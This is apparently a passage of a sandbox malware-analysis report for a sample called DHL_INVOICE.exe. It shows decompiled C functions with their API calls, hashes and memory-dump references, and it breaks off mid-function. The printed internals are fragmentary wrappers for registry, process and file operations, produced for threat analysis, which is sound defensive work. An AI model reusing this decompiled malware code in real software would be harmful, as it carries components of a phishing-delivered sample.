                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 6e7d67269c197b40b003dd71ad8670726c572316c8dc3490559f09bac35d8640
                                                                            • Instruction ID: 538a9e804dfe71f8462b772bc95ac31ea7b37d3b99b6caf0eca62282663b68d4
                                                                            • Opcode Fuzzy Hash: 6e7d67269c197b40b003dd71ad8670726c572316c8dc3490559f09bac35d8640
                                                                            • Instruction Fuzzy Hash: 4701D472A152309BD7196F28AC09B6B3699AB80711F15453AF901F72F1D2B89C018758
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004025FF(void* __ebp, signed int _a52, intOrPtr _a56, intOrPtr _a60) {
                                                                            				void* _t9;
                                                                            				signed int _t14;
                                                                            				void* _t16;
                                                                            				void* _t20;
                                                                            				long _t22;
                                                                            				void* _t25;
                                                                            
                                                                            				_t22 = 1;
                                                                            				_t30 = _a56 - __ebp;
                                                                            				if(_a56 != __ebp) {
                                                                            					_t22 = E0040307C(_a60, E0040303E(_t20, 0x22), _a52 >> 1);
                                                                            				} else {
                                                                            					_t9 = E004030C1(_t16, _t20, _t30, 2); // executed
                                                                            					_t25 = _t9;
                                                                            					if(_t25 != 0) {
                                                                            						_t22 = RegDeleteValueW(_t25, E0040303E(_t20, 0x33));
                                                                            						RegCloseKey(_t25);
                                                                            					}
                                                                            				}
                                                                            				_t14 = 0 | _t22 != 0x00000000;
                                                                            				 *0x435ac8 =  *0x435ac8 + _t14;
                                                                            				return 0;
                                                                            			}









                                                                            0x00402601
                                                                            0x00402602
                                                                            0x00402606
                                                                            0x00402648
                                                                            0x00402608
                                                                            0x0040260a
                                                                            0x0040260f
                                                                            0x00402613
                                                                            0x00402625
                                                                            0x00402627
                                                                            0x00402627
                                                                            0x00402613
                                                                            0x0040264e
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402627
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteValue
                                                                            • String ID:
                                                                            • API String ID: 2831762973-0
                                                                            • Opcode ID: 7d9b9e65408846c590e7b8876d8f67edd050b095ff447458a8fbe16232e7be29
                                                                            • Instruction ID: 5f348ce6c2db00307db5fd01af11d87f06065e179f09fd272fc5be425d392e88
                                                                            • Opcode Fuzzy Hash: 7d9b9e65408846c590e7b8876d8f67edd050b095ff447458a8fbe16232e7be29
                                                                            • Instruction Fuzzy Hash: 29F02433545601B7E310ABA49C4AA7E766DABD03A2F10053FFA02A61C5CA7E8C42822D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004066D6(WCHAR* _a4) {
                                                                            				struct _PROCESS_INFORMATION _v20;
                                                                            				int _t7;
                                                                            
                                                                            				0x42fd78->cb = 0x44;
                                                                            				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42fd78,  &_v20); // executed
                                                                            				if(_t7 != 0) {
                                                                            					CloseHandle(_v20.hThread);
                                                                            					return _v20.hProcess;
                                                                            				}
                                                                            				return _t7;
                                                                            			}





                                                                            0x004066dc
                                                                            0x004066ff
                                                                            0x00406707
                                                                            0x0040670c
                                                                            0x00000000
                                                                            0x00406712
                                                                            0x00406716

                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FD78,?), ref: 004066FF
                                                                            • CloseHandle.KERNEL32(?), ref: 0040670C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3712363035-0
                                                                            • Opcode ID: 56b83460f623c560f9136c4b0375a20ff073fe194eb282a2dd1e719b426acf2b
                                                                            • Instruction ID: 0c6c23135c748ad7b6e02b48b863ea359631b5b673f9ca8adb803affa24eb5bb
                                                                            • Opcode Fuzzy Hash: 56b83460f623c560f9136c4b0375a20ff073fe194eb282a2dd1e719b426acf2b
                                                                            • Instruction Fuzzy Hash: F3E04FF0600619BFFB009B64EC09F7B777CEB40204F904435BD11E6151E3749C148A78
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040691B(WCHAR* _a4, long _a8, long _a12) {
                                                                            				long _t5;
                                                                            				void* _t7;
                                                                            
                                                                            				_t5 = GetFileAttributesW(_a4); // executed
                                                                            				_t6 =  ==  ? 0 : _t5;
                                                                            				_t7 = CreateFileW(_a4, _a8, 1, 0, _a12,  ==  ? 0 : _t5, 0); // executed
                                                                            				return _t7;
                                                                            			}





                                                                            0x0040691f
                                                                            0x0040692c
                                                                            0x0040693f
                                                                            0x00406945

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\DHL_INVOICE.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: 29eaa5c778d4abe525d16e25b35aaa524ea266b59eab42b9d8fe5f4f647b10db
                                                                            • Instruction ID: d43685c7aa133134ae341259a1979053aa5ebee8cfee21dedca447a2e346f0f1
                                                                            • Opcode Fuzzy Hash: 29eaa5c778d4abe525d16e25b35aaa524ea266b59eab42b9d8fe5f4f647b10db
                                                                            • Instruction Fuzzy Hash: 77D09E71218202AEEF055F20DE4AF1FBA65EF84710F104A2CF6A6D40F0D6718C24AA11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00406B9D(WCHAR* _a4) {
                                                                            				signed int _t3;
                                                                            				signed int _t8;
                                                                            
                                                                            				_t3 = GetFileAttributesW(_a4); // executed
                                                                            				_t8 = _t3;
                                                                            				if(_t8 != 0xffffffff) {
                                                                            					SetFileAttributesW(_a4, _t8 & 0xfffffffe);
                                                                            				}
                                                                            				return _t8;
                                                                            			}





                                                                            0x00406ba2
                                                                            0x00406ba8
                                                                            0x00406bad
                                                                            0x00406bb9
                                                                            0x00406bb9
                                                                            0x00406bc2

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00406591,?,?,00000000,004068AE,?,?,?,?), ref: 00406BA2
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406BB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: a418f70179c15550a51c69d56742fce75144ee9ce949d273047196127aa882e5
                                                                            • Instruction ID: 2641cd0fcf7a615d2272f2c652f3c677170a534def33f5957a60d90ba1304b54
                                                                            • Opcode Fuzzy Hash: a418f70179c15550a51c69d56742fce75144ee9ce949d273047196127aa882e5
                                                                            • Instruction Fuzzy Hash: 11D0A7712040316BC6042738DC0C45ABA56DB853707018735F9F6A22F1D7300C2186D4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 50%
                                                                            			E6F1C2D14(intOrPtr _a4) {
                                                                            				signed int _v8;
                                                                            				void* __ebx;
                                                                            				void* _t28;
                                                                            				void* _t29;
                                                                            				int _t33;
                                                                            				void* _t37;
                                                                            				void* _t44;
                                                                            				void* _t47;
                                                                            				signed int _t53;
                                                                            				void* _t58;
                                                                            				intOrPtr _t64;
                                                                            				intOrPtr _t67;
                                                                            				signed int _t72;
                                                                            				intOrPtr _t74;
                                                                            				intOrPtr _t75;
                                                                            				signed int _t78;
                                                                            				void* _t80;
                                                                            				void* _t81;
                                                                            				void* _t82;
                                                                            				void* _t83;
                                                                            				intOrPtr _t86;
                                                                            				intOrPtr _t87;
                                                                            
                                                                            				if( *0x6f1c5024 != 0 && E6F1C1BC1(_a4) == 0) {
                                                                            					 *0x6f1c5030 = _t86;
                                                                            					if( *0x6f1c5034 != 0) {
                                                                            						_t86 =  *0x6f1c5034;
                                                                            					} else {
                                                                            						E6F1C3250(E6F1C1C43());
                                                                            						 *0x6f1c5034 = _t86;
                                                                            					}
                                                                            				}
                                                                            				_t28 = E6F1C1C49(_a4);
                                                                            				_t87 = _t86 + 4;
                                                                            				if(_t28 <= 0) {
                                                                            					L9:
                                                                            					_t29 = E6F1C1BBB();
                                                                            					_t67 = _a4;
                                                                            					_t74 =  *0x6f1c5028;
                                                                            					 *((intOrPtr*)(_t29 + _t67)) = _t74;
                                                                            					 *0x6f1c5028 = _t67;
                                                                            					E6F1C1C5A();
                                                                            					_t33 = EnumWindows(??, ??); // executed
                                                                            					 *0x6f1c5000 = _t33;
                                                                            					 *0x6f1c5004 = _t74;
                                                                            					if( *0x6f1c5024 != 0 && E6F1C1BC1( *0x6f1c5028) == 0) {
                                                                            						 *0x6f1c5034 = _t87;
                                                                            						_t87 =  *0x6f1c5030;
                                                                            					}
                                                                            					_t75 =  *0x6f1c5028;
                                                                            					_a4 = _t75;
                                                                            					 *0x6f1c5028 =  *((intOrPtr*)(E6F1C1BBB() + _t75));
                                                                            					_t37 = E6F1C1BAD(_t75);
                                                                            					_pop(_t76);
                                                                            					if(_t37 != 0) {
                                                                            						_t37 = E6F1C1C49(_t76);
                                                                            						if(_t37 > 0) {
                                                                            							_push(_t37);
                                                                            							_push(E6F1C1C54() + _a4 + _v8);
                                                                            							_push(E6F1C1C64());
                                                                            							if( *0x6f1c5024 <= 0 || E6F1C1BC1(_a4) != 0) {
                                                                            								_pop(_t81);
                                                                            								_pop(_t44);
                                                                            								if( *((intOrPtr*)(_t44 + _t81)) == 2) {
                                                                            								}
                                                                            								_pop(_t76);
                                                                            								_t37 = _t44 + _v8;
                                                                            								asm("loop 0xfffffff5");
                                                                            							} else {
                                                                            								_pop(_t82);
                                                                            								_pop(_t47);
                                                                            								_t78 =  *(_t47 + _t82);
                                                                            								_t64 =  *0x6f1c5034;
                                                                            								_t76 = _t64 + _t78 * 4;
                                                                            								 *0x6f1c5034 = _t64 + _t78 * 4;
                                                                            								_t37 = _t47 + _v8;
                                                                            								asm("loop 0xffffffeb");
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					if( *0x6f1c5028 == 0) {
                                                                            						 *0x6f1c5034 = 0;
                                                                            					}
                                                                            					_push( *0x6f1c5004);
                                                                            					E6F1C2CBF(_t37, _t64, _t76, _a4,  *0x6f1c5000);
                                                                            					return _a4;
                                                                            				}
                                                                            				_push(E6F1C1C54() + _a4);
                                                                            				_t53 = E6F1C1C60();
                                                                            				_v8 = _t53;
                                                                            				_t72 = _t28;
                                                                            				_push(_t65 + _t53 * _t72);
                                                                            				_t64 = E6F1C1CC3();
                                                                            				_t80 = E6F1C1CBF();
                                                                            				_t83 = E6F1C1C64();
                                                                            				_t58 = _t72;
                                                                            				if( *((intOrPtr*)(_t58 + _t83)) == 2) {
                                                                            					_push( *((intOrPtr*)(_t58 + _t64)));
                                                                            				}
                                                                            				_push( *((intOrPtr*)(_t58 + _t80)));
                                                                            				asm("loop 0xfffffff1");
                                                                            				goto L9;
                                                                            			}

























                                                                            0x6f1c2d24
                                                                            0x6f1c2d35
                                                                            0x6f1c2d42
                                                                            0x6f1c2d56
                                                                            0x6f1c2d44
                                                                            0x6f1c2d49
                                                                            0x6f1c2d4e
                                                                            0x6f1c2d4e
                                                                            0x6f1c2d42
                                                                            0x6f1c2d5f
                                                                            0x6f1c2d64
                                                                            0x6f1c2d6a
                                                                            0x6f1c2dae
                                                                            0x6f1c2dae
                                                                            0x6f1c2db3
                                                                            0x6f1c2db8
                                                                            0x6f1c2dbe
                                                                            0x6f1c2dc0
                                                                            0x6f1c2dc6
                                                                            0x6f1c2dd3
                                                                            0x6f1c2dd5
                                                                            0x6f1c2dda
                                                                            0x6f1c2de7
                                                                            0x6f1c2dfa
                                                                            0x6f1c2e00
                                                                            0x6f1c2e06
                                                                            0x6f1c2e07
                                                                            0x6f1c2e0d
                                                                            0x6f1c2e19
                                                                            0x6f1c2e1f
                                                                            0x6f1c2e27
                                                                            0x6f1c2e28
                                                                            0x6f1c2e2b
                                                                            0x6f1c2e36
                                                                            0x6f1c2e38
                                                                            0x6f1c2e44
                                                                            0x6f1c2e4a
                                                                            0x6f1c2e52
                                                                            0x6f1c2e7e
                                                                            0x6f1c2e7f
                                                                            0x6f1c2e85
                                                                            0x6f1c2e85
                                                                            0x6f1c2e88
                                                                            0x6f1c2e89
                                                                            0x6f1c2e8c
                                                                            0x6f1c2e62
                                                                            0x6f1c2e62
                                                                            0x6f1c2e63
                                                                            0x6f1c2e65
                                                                            0x6f1c2e68
                                                                            0x6f1c2e6e
                                                                            0x6f1c2e71
                                                                            0x6f1c2e77
                                                                            0x6f1c2e7a
                                                                            0x6f1c2e7a
                                                                            0x6f1c2e52
                                                                            0x6f1c2e36
                                                                            0x6f1c2e95
                                                                            0x6f1c2e97
                                                                            0x6f1c2e97
                                                                            0x6f1c2ea1
                                                                            0x6f1c2eb0
                                                                            0x6f1c2ebe
                                                                            0x6f1c2ebe
                                                                            0x6f1c2d75
                                                                            0x6f1c2d76
                                                                            0x6f1c2d7b
                                                                            0x6f1c2d7f
                                                                            0x6f1c2d84
                                                                            0x6f1c2d98
                                                                            0x6f1c2d99
                                                                            0x6f1c2d9a
                                                                            0x6f1c2d9c
                                                                            0x6f1c2da1
                                                                            0x6f1c2da3
                                                                            0x6f1c2da3
                                                                            0x6f1c2da6
                                                                            0x6f1c2dac
                                                                            0x00000000

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1131982632.000000006F1C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F1C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1131958154.000000006F1C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132018644.000000006F1C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132042620.000000006F1C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6f1c0000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: EnumWindows
                                                                            • String ID:
                                                                            • API String ID: 1129996299-0
                                                                            • Opcode ID: 9f8aaa05738b21e643a72bb4d1c5576815e88a0fb31b7cfaf45257b94605a511
                                                                            • Instruction ID: 9afcc22c56df532841d891ada8d9544420ea6ce5687acd07416201b2cccf51f7
                                                                            • Opcode Fuzzy Hash: 9f8aaa05738b21e643a72bb4d1c5576815e88a0fb31b7cfaf45257b94605a511
                                                                            • Instruction Fuzzy Hash: C341A372800704DFDF009F68DA81B593BB4EB653E8F2154AAE504EA290D73DA4719B96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00402566(void* __ecx, WCHAR* __ebp, void* _a12, intOrPtr _a40, intOrPtr _a56) {
                                                                            				int _t4;
                                                                            				intOrPtr _t9;
                                                                            				void* _t13;
                                                                            				WCHAR* _t14;
                                                                            				WCHAR* _t16;
                                                                            				WCHAR* _t18;
                                                                            				void* _t20;
                                                                            
                                                                            				_t18 = __ebp;
                                                                            				_t16 = __ebp;
                                                                            				_t14 = __ebp;
                                                                            				if(__ecx != 0) {
                                                                            					__ebp = E0040303E(__edx, __ebp);
                                                                            				}
                                                                            				if(_t4 != 0) {
                                                                            					_t16 = E0040303E(_t13, 0x11);
                                                                            				}
                                                                            				if(_a56 != _t14) {
                                                                            					_t14 = E0040303E(_t13, 0x22);
                                                                            				}
                                                                            				_t4 = WritePrivateProfileStringW(_t18, _t16, _t14, E0040303E(_t13, 0xffffffcd)); // executed
                                                                            				if(_t4 != 0) {
                                                                            					_t9 =  *((intOrPtr*)(_t20 + 0x10));
                                                                            				} else {
                                                                            					_t9 = 1;
                                                                            				}
                                                                            				 *0x435ac8 =  *0x435ac8 + _t9;
                                                                            				return 0;
                                                                            			}










                                                                            0x00402566
                                                                            0x00402566
                                                                            0x00402568
                                                                            0x0040256c
                                                                            0x00402574
                                                                            0x00402576
                                                                            0x0040257c
                                                                            0x00402585
                                                                            0x00402585
                                                                            0x0040258b
                                                                            0x00402594
                                                                            0x00402594
                                                                            0x004025a1
                                                                            0x00401703
                                                                            0x00402ea1
                                                                            0x00401709
                                                                            0x0040170b
                                                                            0x0040170b
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 004025A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID:
                                                                            • API String ID: 390214022-0
                                                                            • Opcode ID: 9af0a1d878fae9e3e89ffa2e9034ec420723555003de84cdee57c9f052185a13
                                                                            • Instruction ID: f65784f0cf837312192d28317bace7b0ee78b13f5a7e28397f60b6fd89985110
                                                                            • Opcode Fuzzy Hash: 9af0a1d878fae9e3e89ffa2e9034ec420723555003de84cdee57c9f052185a13
                                                                            • Instruction Fuzzy Hash: 90E09A32505254BAD6703A738C09B2B299C5B407A2B64023FB806B22CAE9F98E01812D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00406948(void* __ecx, void* _a4, void* _a8, long _a12) {
                                                                            				long _v8;
                                                                            				int _t7;
                                                                            				long _t11;
                                                                            				struct _OVERLAPPED* _t14;
                                                                            
                                                                            				_t11 = _a12;
                                                                            				_t14 = 0;
                                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_v8, 0); // executed
                                                                            				if(_t7 != 0 && _t11 == _v8) {
                                                                            					_t14 = 1;
                                                                            				}
                                                                            				return _t14;
                                                                            			}







                                                                            0x0040694e
                                                                            0x00406954
                                                                            0x0040695f
                                                                            0x00406967
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x00406974

                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 0040695F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 2db7c5b5d383cb428e65bf87e114ea6cc39ae6a838efe8624f6ef6c49ed421ec
                                                                            • Instruction ID: 496ccccc8c492c243bc388fe3eb656b5cfb520ee4410d2fb8332981663b8a2fe
                                                                            • Opcode Fuzzy Hash: 2db7c5b5d383cb428e65bf87e114ea6cc39ae6a838efe8624f6ef6c49ed421ec
                                                                            • Instruction Fuzzy Hash: 38E04672200229BBCF209B9ADC08D9FBFADEE957A07024026B805A3110D270EE21C6E4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00406A0B(void* __ecx, void* _a4, void* _a8, long _a12) {
                                                                            				long _v8;
                                                                            				int _t7;
                                                                            				long _t11;
                                                                            				struct _OVERLAPPED* _t14;
                                                                            
                                                                            				_t11 = _a12;
                                                                            				_t14 = 0;
                                                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_v8, 0); // executed
                                                                            				if(_t7 != 0 && _t11 == _v8) {
                                                                            					_t14 = 1;
                                                                            				}
                                                                            				return _t14;
